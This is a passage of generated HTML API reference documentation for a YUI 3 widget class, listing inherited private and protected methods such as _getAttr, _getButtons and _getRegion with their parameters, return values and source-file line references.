<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l489"><code>widget-stdmod/js/Widget-StdMod.js:489</code></a>
</p>
</div>
<div class="description">
<p>Removes the DOM node for the given section.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The section to remove. Either WidgetStdMod.HEADER, WidgetStdMod.BODY or WidgetStdMod.FOOTER.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__fillHeight" class="method item private inherited">
<h3 class="name"><code>_fillHeight</code></h3>
<span class="paren">()</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__fillHeight">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l422"><code>widget-stdmod/js/Widget-StdMod.js:422</code></a>
</p>
</div>
<div class="description">
<p>Updates the rendered UI, to resize the current section specified by the fillHeight attribute, so
that the standard module fills out the Widget height. If a height has not been set on Widget,
the section is not resized (height is set to "auto").</p>
</div>
</div>
<div id="method__filterAdHocAttrs" class="method item private inherited">
<h3 class="name"><code>_filterAdHocAttrs</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>allAttrs</code>
</li>
<li class="arg">
<code>userVals</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__filterAdHocAttrs">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l343"><code>base/js/BaseCore.js:343</code></a>
</p>
</div>
<div class="description">
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">allAttrs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The set of all attribute configurations for this instance.
Attributes will be removed from this set, if they belong to the filtered class, so
that by the time all classes are processed, allCfgs will be empty.</p>
</div>
</li>
<li class="param">
<code class="param-name">userVals</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The config object passed in by the user, from which adhoc attrs are to be filtered.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
The set of adhoc attributes passed in, in the form
of an object with attribute name/configuration pairs.
</div>
</div>
</div>
<div id="method__filterAttrCfs" class="method item private inherited">
<h3 class="name"><code>_filterAttrCfs</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>clazz</code>
</li>
<li class="arg">
<code>allCfgs</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__filterAttrCfs">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l311"><code>base/js/BaseCore.js:311</code></a>
</p>
</div>
<div class="description">
<p>A helper method used when processing ATTRS across the class hierarchy during
initialization. Returns a disposable object with the attributes defined for
the provided class, extracted from the set of all attributes passed in.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">clazz</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Function" class="crosslink external" target="_blank">Function</a></span>
<div class="param-description">
<p>The class for which the desired attributes are required.</p>
</div>
</li>
<li class="param">
<code class="param-name">allCfgs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The set of all attribute configurations for this instance.
Attributes will be removed from this set, if they belong to the filtered class, so
that by the time all classes are processed, allCfgs will be empty.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
The set of attributes belonging to the class passed in, in the form
of an object with attribute name/configuration pairs.
</div>
</div>
</div>
<div id="method__filterUIEvent" class="method item private inherited">
<h3 class="name"><code>_filterUIEvent</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>evt</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__filterUIEvent">Widget</a>:
<a href="../files/widget_js_WidgetUIEvents.js.html#l117"><code>widget/js/WidgetUIEvents.js:117</code></a>
</p>
</div>
<div class="description">
<p>This method is used to determine if we should fire
the UI Event or not. The default implementation makes sure
that for nested delegates (nested unrelated widgets), we don't
fire the UI event listener more than once at each level.</p>
<p>For example, without the additional filter, if you have nested
widgets, each widget will have a delegate listener. If you
click on the inner widget, the inner delegate listener's
filter will match once, but the outer will match twice
(based on delegate's design) - once for the inner widget,
and once for the outer.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">evt</code>
<span class="type"><a href="../classes/DOMEventFacade.html" class="crosslink">DOMEventFacade</a></span>
<div class="param-description">
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>:
true if it's OK to fire the custom UI event, false if not.
</div>
</div>
</div>
<div id="method__findStdModSection" class="method item private inherited">
<h3 class="name"><code>_findStdModSection</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>section</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__findStdModSection">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l598"><code>widget-stdmod/js/Widget-StdMod.js:598</code></a>
</p>
</div>
<div class="description">
<p>Helper method to to find the rendered node for the given section,
if it exists.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The section for which the render Node is to be found. Either WidgetStdMod.HEADER, WidgetStdMod.BODY or WidgetStdMod.FOOTER.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
The rendered node for the given section, or null if not found.
</div>
</div>
</div>
<div id="method__fireAttrChange" class="method item private inherited">
<h3 class="name"><code>_fireAttrChange</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attrName</code>
</li>
<li class="arg">
<code>subAttrName</code>
</li>
<li class="arg">
<code>currVal</code>
</li>
<li class="arg">
<code>newVal</code>
</li>
<li class="arg">
<code>opts</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeEvents.html#method__fireAttrChange">AttributeEvents</a>:
<a href="../files/attribute_js_AttributeEvents.js.html#l115"><code>attribute/js/AttributeEvents.js:115</code></a>
</p>
</div>
<div class="description">
<p>Utility method to help setup the event payload and fire the attribute change event.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute</p>
</div>
</li>
<li class="param">
<code class="param-name">subAttrName</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The full path of the property being changed,
if this is a sub-attribute value being change. Otherwise null.</p>
</div>
</li>
<li class="param">
<code class="param-name">currVal</code>
<span class="type">Any</span>
<div class="param-description">
<p>The current value of the attribute</p>
</div>
</li>
<li class="param">
<code class="param-name">newVal</code>
<span class="type">Any</span>
<div class="param-description">
<p>The new value of the attribute</p>
</div>
</li>
<li class="param">
<code class="param-name">opts</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>Any additional event data to mix into the attribute change event's event facade.</p>
</div>
</li>
</ul>
</div>
</div>
<div id="method__focus" class="method item inherited">
<h3 class="name"><code>_focus</code></h3>
<span class="paren">()</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__focus">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l269"><code>widget-modality/js/Widget-Modality.js:269</code></a>
</p>
</div>
<div class="description">
<p>Provides mouse and tab focus to the widget's bounding box.</p>
</div>
</div>
<div id="method__getAttr" class="method item protected inherited">
<h3 class="name"><code>_getAttr</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type">Any</span>
</span>
<span class="flag protected">protected</span>
<span class="flag chainable">chainable</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__getAttr">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l468"><code>attribute/js/AttributeCore.js:468</code></a>
</p>
</div>
<div class="description">
<p>Provides the common implementation for the public get method,
allowing Attribute hosts to over-ride either method.</p>
<p>See <a href="#method_get">get</a> for argument details.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type">Any</span>:
The value of the attribute.
</div>
</div>
</div>
<div id="method__getAttrCfg" class="method item protected inherited">
<h3 class="name"><code>_getAttrCfg</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>name</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeExtras.html#method__getAttrCfg">AttributeExtras</a>:
<a href="../files/attribute_js_AttributeExtras.js.html#l112"><code>attribute/js/AttributeExtras.js:112</code></a>
</p>
</div>
<div class="description">
<p>Returns an object with the configuration properties (and value)
for the given attribute. If attrName is not provided, returns the
configuration properties for all attributes.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">name</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>Optional. The attribute name. If not provided, the method will return the configuration for all attributes.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
The configuration properties for the given attribute, or all attributes.
</div>
</div>
</div>
<div id="method__getAttrCfgs" class="method item protected inherited">
<h3 class="name"><code>_getAttrCfgs</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__getAttrCfgs">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l294"><code>base/js/BaseCore.js:294</code></a>
</p>
</div>
<div class="description">
<p>Returns an aggregated set of attribute configurations, by traversing
the class hierarchy.</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
The hash of attribute configurations, aggregated across classes in the hierarchy
This value is cached the first time the method, or _getClasses, is invoked. Subsequent invocations return
the cached value.
</div>
</div>
</div>
<div id="method__getAttrInitVal" class="method item private inherited">
<h3 class="name"><code>_getAttrInitVal</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attr</code>
</li>
<li class="arg">
<code>cfg</code>
</li>
<li class="arg">
<code>initValues</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type">Any</span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Attribute.html#method__getAttrInitVal">
Attribute
</a>
but overwritten in
<a href="../files/attribute_js_AttributeCore.js.html#l824"><code>attribute/js/AttributeCore.js:824</code></a>
</p>
</div>
<div class="description">
<p>Returns the initial value of the given attribute from
either the default configuration provided, or the
over-ridden value if it exists in the set of initValues
provided and the attribute is not read-only.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attr</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The name of the attribute</p>
</div>
</li>
<li class="param">
<code class="param-name">cfg</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The attribute configuration object</p>
</div>
</li>
<li class="param">
<code class="param-name">initValues</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The object with simple and complex attribute name/value pairs returned from _normAttrVals</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type">Any</span>:
The initial value of the attribute.
</div>
</div>
</div>
<div id="method__getAttrs" class="method item protected inherited">
<h3 class="name"><code>_getAttrs</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>attrs</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/AttributeCore.html#method__getAttrs">AttributeCore</a>:
<a href="../files/attribute_js_AttributeCore.js.html#l678"><code>attribute/js/AttributeCore.js:678</code></a>
</p>
</div>
<div class="description">
<p>Implementation behind the public getAttrs method, to get multiple attribute values.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">attrs</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Array" class="crosslink external" target="_blank">Array</a> | boolean</span>
<div class="param-description">
<p>Optional. An array of attribute names. If omitted, all attribute values are
returned. If set to true, all attributes modified from their initial values are returned.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
An object with attribute name/value pairs.
</div>
</div>
</div>
<div id="method__getButtonContainer" class="method item protected inherited">
<h3 class="name"><code>_getButtonContainer</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>section</code>
</li>
<li class="arg">
<code>create</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__getButtonContainer">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l581"><code>widget-buttons/js/widget-buttons.js:581</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Returns the buttons container for the specified <code>section</code>, passing a truthy
value for <code>create</code> will create the node if it does not already exist.</p>
<p><strong>Note:</strong> It is up to the caller to properly insert the returned container
node into the content section.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">section</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
<div class="param-description">
<p>The <code>WidgetStdMod</code> section (header/body/footer).</p>
</div>
</li>
<li class="param">
<code class="param-name">create</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
<div class="param-description">
<p>Whether the buttons container should be created if
it does not already exist.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
The buttons container node for the specified <code>section</code>.
</div>
</div>
</div>
<div id="method__getButtonDefault" class="method item protected inherited">
<h3 class="name"><code>_getButtonDefault</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>button</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__getButtonDefault">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l616"><code>widget-buttons/js/widget-buttons.js:616</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Returns whether or not the specified <code>button</code> is configured to be the
default button.</p>
<p>When a button node is specified, the button's <code>getData()</code> method will be
used to determine if the button is configured to be the default. When a
button config object is specified, the <code>isDefault</code> prop will determine
whether the button is the default.</p>
<p><strong>Note:</strong> <code><button data-default="true"></button></code> is supported via the
<code>button.getData('default')</code> API call.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">button</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The button node or configuration object.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Boolean" class="crosslink external" target="_blank">Boolean</a></span>:
Whether the button is configured to be the default button.
</div>
</div>
</div>
<div id="method__getButtonName" class="method item protected inherited">
<h3 class="name"><code>_getButtonName</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>button</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__getButtonName">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l645"><code>widget-buttons/js/widget-buttons.js:645</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Returns the name of the specified <code>button</code>.</p>
<p>When a button node is specified, the button's <code>getData('name')</code> method is
preferred, but will fallback to <code>get('name')</code>, and the result will determine
the button's name. When a button config object is specified, the <code>name</code> prop
will determine the button's name.</p>
<p><strong>Note:</strong> <code><button data-name="foo"></button></code> is supported via the
<code>button.getData('name')</code> API call.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">button</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a> | <a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The button node or configuration object.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/String" class="crosslink external" target="_blank">String</a></span>:
The name of the button.
</div>
</div>
</div>
<div id="method__getButtons" class="method item protected inherited">
<h3 class="name"><code>_getButtons</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>buttons</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetButtons.html#method__getButtons">WidgetButtons</a>:
<a href="../files/widget-buttons_js_widget-buttons.js.html#l674"><code>widget-buttons/js/widget-buttons.js:674</code></a>
</p>
<p>Available since 3.5.0</p>
</div>
<div class="description">
<p>Getter for the <code>buttons</code> attribute. A copy of the <code>buttons</code> object is
returned so the stored state cannot be modified by the callers of
<code>get('buttons')</code>.</p>
<p>This will recreate a copy of the <code>buttons</code> object, and each section array
(the button nodes are <em>not</em> copied/cloned.)</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">buttons</code>
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
<div class="param-description">
<p>The widget's current <code>buttons</code> state.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
A copy of the widget's current <code>buttons</code> state.
</div>
</div>
</div>
<div id="method__getClasses" class="method item protected inherited">
<h3 class="name"><code>_getClasses</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Function" class="crosslink external" target="_blank">Function[]</a></span>
</span>
<span class="flag protected">protected</span>
<div class="meta">
<p>Inherited from
<a href="../classes/BaseCore.html#method__getClasses">BaseCore</a>:
<a href="../files/base_js_BaseCore.js.html#l278"><code>base/js/BaseCore.js:278</code></a>
</p>
</div>
<div class="description">
<p>Returns the class hierarchy for this object, with BaseCore being the last class in the array.</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Function" class="crosslink external" target="_blank">Function[]</a></span>:
An array of classes (constructor functions), making up the class hierarchy for this object.
This value is cached the first time the method, or _getAttrCfgs, is invoked. Subsequent invocations return the
cached value.
</div>
</div>
</div>
<div id="method__getHtmlParser" class="method item private inherited">
<h3 class="name"><code>_getHtmlParser</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__getHtmlParser">Widget</a>:
<a href="../files/widget_js_WidgetHTMLParser.js.html#l149"><code>widget/js/WidgetHTMLParser.js:149</code></a>
</p>
</div>
<div class="description">
<p>Gets the HTML<em>PARSER definition for this instance, by merging HTML</em>PARSER
definitions across the class hierarchy.</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
HTML_PARSER definition for this instance
</div>
</div>
</div>
<div id="method__getMaskNode" class="method item inherited">
<h3 class="name"><code>_getMaskNode</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetModality.html#method__getMaskNode">WidgetModality</a>:
<a href="../files/widget-modality_js_Widget-Modality.js.html#l292"><code>widget-modality/js/Widget-Modality.js:292</code></a>
</p>
</div>
<div class="description">
<p>Returns the Y.Node instance of the maskNode</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
The Y.Node instance of the mask, as returned from WidgetModal.<em>GET</em>MASK
</div>
</div>
</div>
<div id="method__getNodeToParse" class="method item private inherited">
<h3 class="name"><code>_getNodeToParse</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/Widget.html#method__getNodeToParse">Widget</a>:
<a href="../files/widget_js_WidgetHTMLParser.js.html#l134"><code>widget/js/WidgetHTMLParser.js:134</code></a>
</p>
</div>
<div class="description">
<p>Determines whether we have a node reference which we should try and parse.</p>
<p>The current implementation does not parse nodes generated from CONTENT_TEMPLATE,
only explicitly set srcNode, or contentBox attributes.</p>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>:
The node reference to apply HTML_PARSER to.
</div>
</div>
</div>
<div id="method__getPreciseHeight" class="method item private inherited">
<h3 class="name"><code>_getPreciseHeight</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code>node</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStdMod.html#method__getPreciseHeight">WidgetStdMod</a>:
<a href="../files/widget-stdmod_js_Widget-StdMod.js.html#l575"><code>widget-stdmod/js/Widget-StdMod.js:575</code></a>
</p>
</div>
<div class="description">
<p>Helper method to obtain the precise height of the node provided, including padding and border.
The height could be a sub-pixel value for certain browsers, such as Firefox 3.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name">node</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<div class="param-description">
<p>The node for which the precise height is required.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="../classes/Number.html" class="crosslink">Number</a></span>:
The height of the Node including borders and padding, possibly a float.
</div>
</div>
</div>
<div id="method__getRegion" class="method item private inherited">
<h3 class="name"><code>_getRegion</code></h3>
<div class="args">
<span class="paren">(</span><ul class="args-list inline commas">
<li class="arg">
<code class="optional">[node]</code>
</li>
</ul><span class="paren">)</span>
</div>
<span class="returns-inline">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetPositionConstrain.html#method__getRegion">
WidgetPositionConstrain
</a>
but overwritten in
<a href="../files/widget-position-align_js_Widget-PositionAlign.js.html#l590"><code>widget-position-align/js/Widget-PositionAlign.js:590</code></a>
</p>
</div>
<div class="description">
<p>Returns the region of the passed-in <code>Node</code>, or the viewport region if
calling with passing in a <code>Node</code>.</p>
</div>
<div class="params">
<h4>Parameters:</h4>
<ul class="params-list">
<li class="param">
<code class="param-name optional">[node]</code>
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
<span class="flag optional" title="This parameter is optional.">optional</span>
<div class="param-description">
<p>The node to get the region of.</p>
</div>
</li>
</ul>
</div>
<div class="returns">
<h4>Returns:</h4>
<div class="returns-description">
<span class="type"><a href="https://developer.mozilla.org/en/JavaScript/Reference/Global_Objects/Object" class="crosslink external" target="_blank">Object</a></span>:
The node's region.
</div>
</div>
</div>
<div id="method__getShimTemplate" class="method item private inherited">
<h3 class="name"><code>_getShimTemplate</code></h3>
<span class="paren">()</span>
<span class="returns-inline">
<span class="type"><a href="../classes/Node.html" class="crosslink">Node</a></span>
</span>
<span class="flag private">private</span>
<div class="meta">
<p>Inherited from
<a href="../classes/WidgetStack.html#method__getShimTemplate">WidgetStack</a>:
<a href="../files/widget-stack_js_Widget-Stack.js.html#l421"><code>widget-stack/js/Widget-Stack.js:421</code></a>
</p>
</div>
<div class="description">
